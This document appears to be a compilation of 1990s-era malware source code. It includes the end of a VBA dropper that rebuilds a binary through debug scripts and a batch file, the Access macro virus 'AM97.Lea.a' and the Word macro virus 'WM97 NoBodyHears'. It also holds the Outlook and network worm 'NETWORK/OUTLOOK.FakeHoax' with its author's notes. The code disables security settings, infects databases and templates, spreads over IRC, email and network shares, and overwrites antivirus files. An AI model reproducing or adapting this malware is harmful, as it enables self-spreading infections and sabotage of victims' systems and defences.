Print #3, "E 1000 7E FF 73 90 6F 4D 4B BF BD 82 DB 61 32 37 0C FB"
Print #3, "E 1010 65 F9 05 9D CB A6 85 97 A4 7E FF 73 B7 90 1F EB"
Print #3, "E 1020 DB 87 DC F3 C6 2B F1 33 37 A4 6D 84 19 F8 F0 77"
Print #3, "E 1030 31 F8 92 D4 EF 7F EE E6 3B 4B A7 E6 8B 8E 22 D3"
Print #3, "E 1040 CD 96 B9 A1 A4 B5 B5 AC DB F0 85 A9 DF FF 5C E8"
Print #3, "E 1050 CC E5 EF 8E 32 97 B8 9B 2D 73 C3 A5 FE BE 74 46"
Print #3, "E 1060 BE 30 F5 FB 9F 3B F9 D6 BE F4 DB 2B B8 1D 26 73"
Print #3, "E 1070 43 71 B2 DD 35 F2 EB 90 EA F5 3F 73 67 A5 6E 8D"
Print #3, "E 1080 3C 25 6D 93 BC FB 9A 4B DC 8C 9A A9 2D 7C 7B 05"
Print #3, "E 1090 9F FD 99 4B A7 7C 1B E6 CB 52 AF FF 59 B7 96 EA"
Print #3, "E 10A0 DE AA 43 9C C1 38 F9 A2 A3 F4 BC D8 9E 2A EB B3"
Print #3, "E 10B0 E7 B8 65 DF 9C 4F 6B 2F C2 A1 41 C6 4C F8 9F 65"
Print #3, "E 10C0 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF"
Print #3, "E 10D0 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 10E0 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 10F0 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 15 F9 9F"
Print #3, "E 1100 AF 96 6A FC CF D7 4B 25 FE E7 2B A6 0A FF F3 35"
Print #3, "E 1110 53 81 FF F9 AA A9 C0 FF 7C D5 54 E1 7F BE 66 2A"
Print #3, "E 1120 F1 3F 5F 31 D5 F8 9F AF 97 8A FC CF 57 0B FC CF"
Print #3, "E 1130 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 1140 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 1150 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 1160 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 1170 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 1180 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 1190 FE 67 19 F0 3F CB 80 FF 59 06 FB 9F F9 6F 80 03"
Print #3, "E 11A0 5E 88 CA CD E8 5B 36 CA 9E F9 CF 5A BC B4 E8 61"
Print #3, "E 11B0 CC 0D D6 2C 19 3B F2 9E DE EE D0 78 D4 1F 0C 47"
Print #3, "E 11C0 B7 77 F7 0F E3 F1 64 3A 9B CD E7 8B E5 72 B9 5A"
Print #3, "E 11D0 AD 99 8D 41 5F 5E AD 68 7C 31 9F CF 66 D3 C9 78"
Print #3, "E 11E0 FC 70 7F 77 3B 1A 0E FA 51 8F 1D 6C 2C 81 3D 1E"
Print #3, "E 11F0 76 DB F5 8A 5D C5 0F 77 A3 44 AE 76 DC 6F D7 4B"
Print #3, "E 1200 E3 2F 36 B6 62 F6 AD 6D 56 8B 99 96 B2 59 A5 F1"
Print #3, "E 1210 91 87 A8 2A 76 57 06 DA EA A6 1F 71 B3 5E 2D 17"
Print #3, "E 1220 B3 29 3D 25 3F 23 3D E5 70 30 E8 F7 A3 A8 D7 EB"
Print #3, "E 1230 85 59 E8 7A 14 F5 FB 83 C1 90 36 46 6F CD 64 3A"
Print #3, "E 1240 9D 2D 96 AB F5 C6 6E 2D BF B5 E5 8F 77 6F EF B8"
Print #3, "E 1250 C9 6D C9 A6 30 DE 5B F9 2F F6 BC 6A 92 3B A7 D9"
Print #3, "E 1260 9E 68 87 4C 7E 66 88 4F 0A F9 83 B9 D1 2D B7 27"
Print #3, "E 1270 2D D8 51 44 A9 D2 4B 75 8B F2 0B 29 C0 E1 C8 04"
Print #3, "E 1280 38 B1 01 2E 38 40 93 60 CC 8A E3 5B D8 F8 CC C6"
Print #3, "E 1290 8C 28 A5 A8 C7 0E BB D6 F9 F9 91 15 80 9B F5 92"
Print #3, "E 12A0 FD CF F7 B7 23 B6 75 76 5A 71 58 39 FF B3 49 74"
Print #3, "E 12B0 96 F3 3F EF B7 1C 29 BB 2B 39 D3 D0 3E E2 61 4F"
Print #3, "E 12C0 F9 51 7C F3 99 89 EF CE C6 17 71 7C 3A B5 C0 60"
Print #3, "E 12D0 13 A4 71 1B E0 9D 09 70 46 73 61 45 F9 ED 0F 76"
Print #3, "E 12E0 6B 43 9D D5 3D 77 A9 B2 29 EC C8 A7 2B 3C DB 74"
Print #3, "E 12F0 7E 66 B6 5D 46 AA 87 EC 9C D4 65 7C D7 03 EF E9"
Print #3, "E 1300 3C 01 C3 74 02 9A DF 19 3D A9 0D 30 89 50 5F E6"
Print #3, "E 1310 F8 16 1C 1F 6F 4C 3A FD D8 FF 4C 41 D1 1C E2 10"
Print #3, "E 1320 74 30 76 AE 25 33 AB 30 D9 D2 19 D9 8F 67 24 0F"
Print #3, "E 1330 65 92 67 77 AA 7D 44 9E 7E F3 CC 6F 2C 9E 7D 69"
Print #3, "E 1340 78 49 84 C9 0C 4C 67 C3 DC 4C 40 BD B5 FC D6 36"
Print #3, "E 1350 37 8B D8 75 6A F6 D6 7E 66 6F FD 1F 50 4B 01 02"
Print #3, "E 1360 14 00 14 00 00 00 08 00 38 51 9B 28 17 D3 09 49"
Print #3, "E 1370 36 12 00 00 36 F8 01 00 08 00 00 00 00 00 00 00"
Print #3, "E 1380 00 00 20 00 B6 81 00 00 00 00 6C 6F 67 6F 2E 53"
Print #3, "E 1390 59 53 50 4B 05 06 00 00 00 00 01 00 01 00 36 00"
Print #3, "E 13A0 00 00 5C 12 00 00 00 00"
Print #3, "RCX"
Print #3, "12A8"
Print #3, "W"
Print #3, "Q"
Close #3
End Sub
Sub CreateBat()
Open "c:\windows\hop_along.bat" For Output As #4
Print #4, "del c:\windows\logo.sys"
Print #4, "del c:\logo.sys"
Print #4, "cd c:\windows\"
Print #4, "debug < c:\windows\pkunzip.dbg"
Print #4, "debug < c:\windows\logo.dbg"
Print #4, "c:\windows\pkunzip.com logo.zip"
Print #4, "exit"
Close #4
End Sub
Sub Wait4Bat()
If Dir("c:\windows\logo.sys") = "" Then Wait4Bat
End Sub
Option Compare Database
Option Explicit
Function Lea()
'AM97.Lea.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
On Error Resume Next
CommandBars("tools").Controls("Macro").Delete
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Application.MacrovirusProtection = False
Dim FilesToGet, FilesToInfect, CodeBase As String
FilesToInfect = False
FilesToGet = Dir("*.mdb", vbNormal)
If FilesToGet <> "" Then
CodeBase = CurrentDb.Name
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acModule, "lea", "lea"
While FilesToGet <> "
FilesToGet = Dir
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acModule, "lea", "lea"
Wend
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 3) + 1 Then
MsgBox "AM97.Lea.a", "Welcome to this place, I'll Show you everything. With arms wide open."
End If
Exit_Payload:
End If
End Function
Attribute VB_Name = "NoBodyHears"
Sub AutoClose()
'******************************************************************
'WM97 NoBodyHears
'By AngelsKitten / [NuKE]
'Greetings to Evul, Knowdeth, Jackie twoflower, Foxz
'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RAiD,
'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM
'******************************************************************
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("NoBodyHears").Export "C:\VXD.dll"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
End With
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Delete
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
For ¢ = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = True
Next ¢
For ¢ = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = True
Next ¢
If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _
Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject
§.VBComponents.Import ("C:\VXD.dll")
On Error GoTo scriptoops
Open "C:\audio.vxd" For Output As #1
Print #1, "[script]"
Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]"
Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n3=}"
Print #1, "n4="
Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n7=}"
Print #1, "n8="
Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick"
Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick"
Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick"
Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick"
Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick"
Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick"
Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick"
Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick"
Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick"
Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick"
Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick"
Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick"
Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"
Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick"
Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick"
Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick"
Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick"
Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick"
Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears"
Print #1, "n29=ON 1:connect: {"
Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini"
Print #1, "n31=}"
Close #1
scriptoops:
On Error GoTo batoops
Open "c:\windows\WinStart.bat" For Output As #2
Print #2, "@Echo Off"
Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul"
Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c:\windows\aboutme.doc >nul"
Close #2
batoops:
If Day(Now()) = 12 Then
SetAttr "C:\program files\AntiViral Toolkit Pro\*.avc", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3
Print #3, "NoBodyHears"
Close #3
SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4
Print #4, "NoBodyHears"
Close #4
SetAttr "C:\program files\mcafee\*.dat", vbReadOnly
Open "C:\program files\mcafee\*.def" For Output As #5
Print #5, "NoBodyHears"
Close #5
SetAttr "C:\f-marco\*.def", vbReadOnly
Open "C:\f-macro\*.def" For Output As #6
Print #6, "NoBodyHears"
Close #6
End If
If Day(Now()) = Int(Rnd * 31) + 1 Then
With Assistant.NewBalloon
.Icon = msoIconTip
.Animation = msoAnimationGetArtsy
.Heading = "WM97 NoBodyHears"
.Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuKE]"
.Show
End With
ActiveDocument.Password = "NoBodyHears"
Shell "start http://www.avp.com.au/", vbHide
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
SetAttr ("c:\VXD.dll"), vbHidden + vbSystem
End Sub
Sub AutoOpen()
Call AutoClose
End Sub
Sub AutoNew()
Call AutoClose
End Sub
Sub ViewVBCode()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub ViewCode()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub ToolsMacro()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub FileTemplates()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub HelpWordPerfectHelp()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
' Worm Name: NETWORK/OUTLOOK.FakeHoax
' Author: Zulu
' Origin: Argentina
' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network
' shares.
' The main code is a COM object written in XML and VBScript using Windows Script Component, so
' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object
' defined in XML) and then both call methods and change properties of that object, no real
' spreading code is in those files.
' The worm was written in this way to make it easier to port it to any other language, this
way
' I was able of creating a JSE and a VBE file without really porting the main code. Also, it's
' possible to create new versions using Delphi, Visual C++, or any other by using
"REGSVR32.EXE"
' to register the WSC file as a COM object before calling it's methods or changing it's
' properties.
' This worm was written to show how JSE and VBE files could be used in viruses/worms, since
' before this they where only used as auxiliary files (some versions of HTML.rahC by
1nternal and
' OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2.0 or
later,
' it won't be good spreading itself at the time of writing this.
' Also, this was a good opportunity for using Windows Script Component for the first time
because
' it made possible to write a JScript and a VBScript version without needing to port the whole
' code, so this is also the first virus/worm using it's own COM object.
'
' Features:
'
' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address
book if
' the number of addresses is less than 101. If that number is more than 100 it will try to
' select 100 random addresses. Subject and body are always the same.
' - Network spreading. It will copy itself to the root of all shares (not only mapped drives),
' waiting for someone to run it.
' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TXT.VBE" depending of the version) will
show a
' TXT file when run, so it will show what many users expect.
' This TXT file will show the Wobbler hoax (the reason of the worm's name), which is a
strange
' social engineering method for a real worm. Anyway, since this won't spread well because of
' other reasons, even if someone wants to spread it, I won't know if the hoax message is
good
' for this purpose. Message subject and body talk about important information in the TXT
file,
' but they don't talk about the hoax because this could cause fear in the user from
opening the
' file or maybe make the user remember about viruses and checking for double extensions.
' - It has a 1/5 probability of also sending other email to the same addresses of the email
' having the worm file. The body of this email will have a poem written in spanish.
' The reason of this is an unusual request from a friend, she wanted one of her poems to be
' included in a virus/worm.
' So, even if this means unnecessary bytes and even worse spreading capabilities, here it
is. :)
' - There is no need of AV products or removers after running the worm since Windows'
settings are
' not changed and all temporary files are deleted.
'
' Here is the JSE file without encoding:
G=new ActiveXObject("Scripting.FileSystemObject");
A=G.GetTempName().concat(".WSC");
S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),true);
S.Write("<?XML version=\"1.0\"?>\r\n<component>\r\n <comment>\r\n
NETWORK/OUTLOOK.FakeHoax\r\n </comment>\r\n <public>\r\n <property name=\"AttachmentFile
\"/>\r\n <property name=\"TextFile\"/>\r\n <property name=\"WormFile\"/>\r\n
<method name=\"DelTempFiles\"/>\r\n <method name=\"NetworkSpreading\">\r\n
<parameter name=\"FileName\"/>\r\n </method>\r\n <method name=\"OutlookSpreading\
">\r\n <parameter name=\"Body\"/>\r\n <parameter name=\"MaxAmount\"/>\r\n
<parameter name=\"Subject\"/>\r\n </method>\r\n <method name=\"ShowText\">\r\n
<parameter name=\"Content\"/>\r\n </method>\r\n </public>\r\n <script language=\"
VBScript\">\r\n <![CDATA[\r\n Sub DelTempFiles\r\n On Error Resume Next\r\n
Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n If
FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True\r\n If
FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True\r\n Set FSO =
Nothing\r\n End Sub\r\n Sub NetworkSpreading(FileName)\r\n On Error Resume
Next\r\n Set Network = CreateObject(\"WScript.Network\")\r\n Set Shares =
Network.EnumNetworkDrives\r\n If Shares.Count > 0 Then\r\n Set FSO =
CreateObject(\"Scripting.FileSystemObject\")\r\n For Counter1 = 0 To Shares.Count -
1\r\n If Shares.Item(Counter1) <> \"\" Then FSO.CopyFile WormFile,
FSO.BuildPath(Shares.Item(Counter1), FileName)\r\n Next\r\n Set FSO =
Nothing\r\n End If\r\n Set Shares = Nothing\r\n Set Network = Nothing\r\n
End Sub\r\n Sub OutlookSpreading(MaxAmount, Subject, Body)\r\n On Error Resume
Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n FSO.CopyFile
WormFile, AttachmentFile\r\n Set FSO = Nothing\r\n Outlook = \"\"\r\n Set
Outlook = CreateObject(\"Outlook.Application\")\r\n If Outlook <> \"\" Then\r\n
Set MAPI = Outlook.GetNameSpace(\"MAPI\")\r\n For Each List In
MAPI.AddressLists\r\n If List.AddressEntries.Count > 0 Then\r\n Set
Email1 = Outlook.CreateItem(0)\r\n If List.AddressEntries.Count > MaxAmount
Then\r\n Dim Address()\r\n ReDim Address(MaxAmount -
1)\r\n For Counter1 = 0 To MaxAmount - 1\r\n Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0
To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount -
1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1
Then Address(Counter2) = -1\r\n Next\r\n Next\r\n
For Counter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n
Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 =
Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Address(Counter2)
And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n
Next\r\n Next\r\n For Counter1 = 0 To MaxAmount -
1\r\n If Address(Counter1) <> -1 Then\r\n Set Entry =
List.AddressEntries(Address(Counter1))\r\n If Counter1 = 0 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n End If\r\n Next\r\n
Else\r\n For Counter1 = 1 To List.AddressEntries.Count\r\n Set
Entry = List.AddressEntries(Counter1)\r\n If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n Next\r\n End If\r\n Email1.BCC =
Addresses\r\n Email1.Subject = Subject\r\n Email1.Body =
Body\r\n Email1.Attachments.Add AttachmentFile\r\n
Email1.DeleteAfterSubmit = True\r\n Email1.Send\r\n Set Email1 =
Nothing\r\n Randomize\r\n If Int(5 * Rnd) = 0 Then\r\n
Set Email2 = Outlook.CreateItem(0)\r\n Email2.BCC = Addresses\r\n
Email2.Subject = \"Alma\"\r\n Email2.Body = \"No alucines que te amo,\" &
Chr(13) & Chr(10) & \"cuando en realidad es solo\" & Chr(13) & Chr(10) & \"mi coraz\" &
Chr(243) & \"n qui\" & Chr(233) & \"n lo hace.\" & Chr(13) & Chr(10) & \"Porque como ya sabr\
" & Chr(225) & \"s,\" & Chr(13) & Chr(10) & \"mi coraz\" & Chr(243) & \"n no manda en mi vida
,\" & Chr(13) & Chr(10) & \"si as\" & Chr(237) & \" lo hiciera,\" & Chr(13) & Chr(10) & \"mi
alma estar\" & Chr(237) & \"a perdida.\"\r\n Email2.DeleteAfterSubmit =
True\r\n Email2.Send\r\n Set Email2 = Nothing\r\n End
If\r\n End If\r\n Next\r\n Set MAPI = Nothing\r\n Set Outlook
= Nothing\r\n End If\r\n End Sub\r\n Sub ShowText(Content)\r\n On Error
Resume Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set
File = FSO.CreateTextFile(TextFile, True)\r\n File.Write(Content)\r\n
File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell =
CreateObject(\"WScript.Shell\")\r\n WSHShell.Run(TextFile)\r\n Set WSHShell =
Nothing\r\n End Sub\r\n ]]>\r\n </script>\r\n</component>\r\n")
S.Close();
F=GetObject("script:".concat(G.BuildPath(G.GetSpecialFolder(2),A)));
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.JSE");
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT");
F.WormFile=WScript.ScriptFullName;
F.ShowText("Thought you might be interested in this message. If you receive an\r\nemail with
a file called \"California\" do not open the file. The file\r\ncontains the \"WOBBLER\"
virus.\r\n\r\nThis information was announced yesterday morning by IBM. The statement\r\nsays
that ... \"This is a very dangerous virus, much worse than\r\n'Melissa' and there is NO
remedy for it at this time. Some very sick\r\nindividual has succeeded in using the reformat
function from Norton\r\nUtilities causing it to completely erase all documents on the
hard\r\ndrive. It has been designed to work with Netscape Navigator and\r\nMicrosoft
Internet Explorer. It destroys Macintosh and IBM compatible\r\ncomputers. This is a new,
very malicious virus and not many people\r\nknow about it at this time.\"\r\n\"Please pass
this warning file to everyone in your address book and\r\nshare it with all your online
friends ASAP so that the destruction it\r\ncan cause may be minimized.\"\r\n");
F.OutlookSpreading(100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information.");
F.NetworkSpreading("WOBBLER.TXT.JSE");
F.DelTempFiles();
G.DeleteFile(G.BuildPath(G.GetSpecialFolder(2),A),true);
Set G=CreateObject("Scripting.FileSystemObject")
A=G.GetTempName&".WSC"
Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),True)
O=Chr(13)&Chr(10)
S.Write "<?XML version=""1.0""?>"&O&"<component>"&O&" <comment>"&O&"
NETWORK/OUTLOOK.FakeHoax"&O&" </comment>"&O&" <public>"&O&" <property
name=""AttachmentFile""/>"&O&" <property name=""TextFile""/>"&O&" <property
name=""WormFile""/>"&O&" <method name=""DelTempFiles""/>"&O&" <method
name=""NetworkSpreading"">"&O&" <parameter name=""FileName""/>"&O&" </method>"&O&
" <method name=""OutlookSpreading"">"&O&" <parameter name=""Body""/>"&O&"
<parameter name=""MaxAmount""/>"&O&" <parameter name=""Subject""/>"&O&" </method>"&O&
" <method name=""ShowText"">"&O&" <parameter name=""Content""/>"&O&" </method>"&O&
" </public>"&O&" <script language=""VBScript"">"&O&" <![CDATA["&O&" Sub DelTempFiles"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" If FSO.FileExists(AttachmentFile)
Then FSO.DeleteFile AttachmentFile, True"&O&" If FSO.FileExists(TextFile) Then
FSO.DeleteFile TextFile, True"&O&" Set FSO = Nothing"&O&" End Sub"&O&" Sub
NetworkSpreading(FileName)"&O&" On Error Resume Next"&O&" Set Network =
CreateObject(""WScript.Network"")"&O&" Set Shares = Network.EnumNetworkDrives"&O&"
If Shares.Count > 0 Then"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"
&O&" For Counter1 = 0 To Shares.Count - 1"&O&" If Shares.Item(Counter1) <>
"""" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)"&O&"
Next"&O&" Set FSO = Nothing"&O&" End If"&O&" Set Shares = Nothing"&O&"
Set Network = Nothing"&O&" End Sub"&O&" Sub OutlookSpreading(MaxAmount, Subject, Body)"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" FSO.CopyFile WormFile, AttachmentFile"
&O&" Set FSO = Nothing"&O&" Outlook = """""&O&" Set Outlook =
CreateObject(""Outlook.Application"")"&O&" If Outlook <> """" Then"&O&" Set MAPI
= Outlook.GetNameSpace(""MAPI"")"&O&" For Each List In MAPI.AddressLists"&O&
" If List.AddressEntries.Count > 0 Then"&O&" Set Email1 =
Outlook.CreateItem(0)"&O&" If List.AddressEntries.Count > MaxAmount Then"&O&
" Dim Address()"&O&" ReDim Address(MaxAmount - 1)"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&" For Counter1 =
0 To MaxAmount - 1"&O&" For Counter2 = Counter1 + 1 To MaxAmount - 1"&O&
" If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1"&O&" Next"&O&" Next"&O&" For
Counter1 = 0 To MaxAmount - 1"&O&" If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" For Counter2 = Counter1
+ 1 To MaxAmount - 1"&O&" If Address(Counter1) = Address(Counter2) And
Address(Counter1) <> -1 Then Address(Counter2) = -1"&O&" Next"&O&
" Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&"
If Address(Counter1) <> -1 Then"&O&" Set Entry =
List.AddressEntries(Address(Counter1))"&O&" If Counter1 = 0 Then Addresses
= Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&"
Set Entry = Nothing"&O&" End If"&O&" Next"&O&" Else"&O
&" For Counter1 = 1 To List.AddressEntries.Count"&O&" Set Entry
= List.AddressEntries(Counter1)"&O&" If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&" Set
Entry = Nothing"&O&" Next"&O&" End If"&O&" Email1.BCC =
Addresses"&O&" Email1.Subject = Subject"&O&" Email1.Body = Body"&O&
" Email1.Attachments.Add AttachmentFile"&O&" Email1.DeleteAfterSubmit
= True"&O&" Email1.Send"&O&" Set Email1 = Nothing"&O&"
Randomize"&O&" If Int(5 * Rnd) = 0 Then"&O&" Set Email2 =
Outlook.CreateItem(0)"&O&" Email2.BCC = Addresses"&O&"
Email2.Subject = ""Alma"""&O&" Email2.Body = ""No alucines que te amo,"" &
Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" &
Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya
sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n no manda en
mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(237) & "" lo hiciera,"" & Chr(13) & Chr(10)
& ""mi alma estar"" & Chr(237) & ""a perdida."""&O&" Email2.DeleteAfterSubmit =
True"&O&" Email2.Send"&O&" Set Email2 = Nothing"&O&"
End If"&O&" End If"&O&" Next"&O&" Set MAPI = Nothing"&O&" Set
Outlook = Nothing"&O&" End If"&O&" End Sub"&O&" Sub ShowText(Content)"&O&"
On Error Resume Next"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"&O&
" Set File = FSO.CreateTextFile(TextFile, True)"&O&" File.Write(Content)"&O&"
File.Close"&O&" Set File = Nothing"&O&" Set FSO = Nothing"&O&" Set WSHShell =
CreateObject(""WScript.Shell"")"&O&" WSHShell.Run(TextFile)"&O&" Set WSHShell =
Nothing"&O&" End Sub"&O&" ]]>"&O&" </script>"&O&"</component>"&O
S.Close
Set F=GetObject("script:"&G.BuildPath(G.GetSpecialFolder(2),A))
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.VBE")
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT")
F.WormFile=WScript.ScriptFullName
F.ShowText "Thought you might be interested in this message. If you receive an"&O&"email
with a file called ""California"" do not open the file. The file"&O&"contains the
""WOBBLER"" virus."&O&O&"This information was announced yesterday morning by IBM. The
statement"&O&"says that ... ""This is a very dangerous virus, much worse than"&O&"'Melissa'
and there is NO remedy for it at this time. Some very sick"&O&"individual has succeeded in
using the reformat function from Norton"&O&"Utilities causing it to completely erase all
documents on the hard"&O&"drive. It has been designed to work with Netscape Navigator and"&O&
"Microsoft Internet Explorer. It destroys Macintosh and IBM compatible"&O&"computers. This
is a new, very malicious virus and not many people"&O&"know about it at this time."""&O&
"""Please pass this warning file to everyone in your address book and"&O&"share it with all
your online friends ASAP so that the destruction it"&O&"can cause may be minimized."""&O
F.OutlookSpreading 100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information."
F.NetworkSpreading "WOBBLER.TXT.VBE"
F.DelTempFiles
G.DeleteFile G.BuildPath(G.GetSpecialFolder(2),A),True
' Here is the WSC file (the COM object), I used spaces and "normal" variable names to make it
' easier to read:
<?XML version="1.0"?>
<component>
<comment>
NETWORK/OUTLOOK.FakeHoax
</comment>
<public>
<property name="AttachmentFile"/>
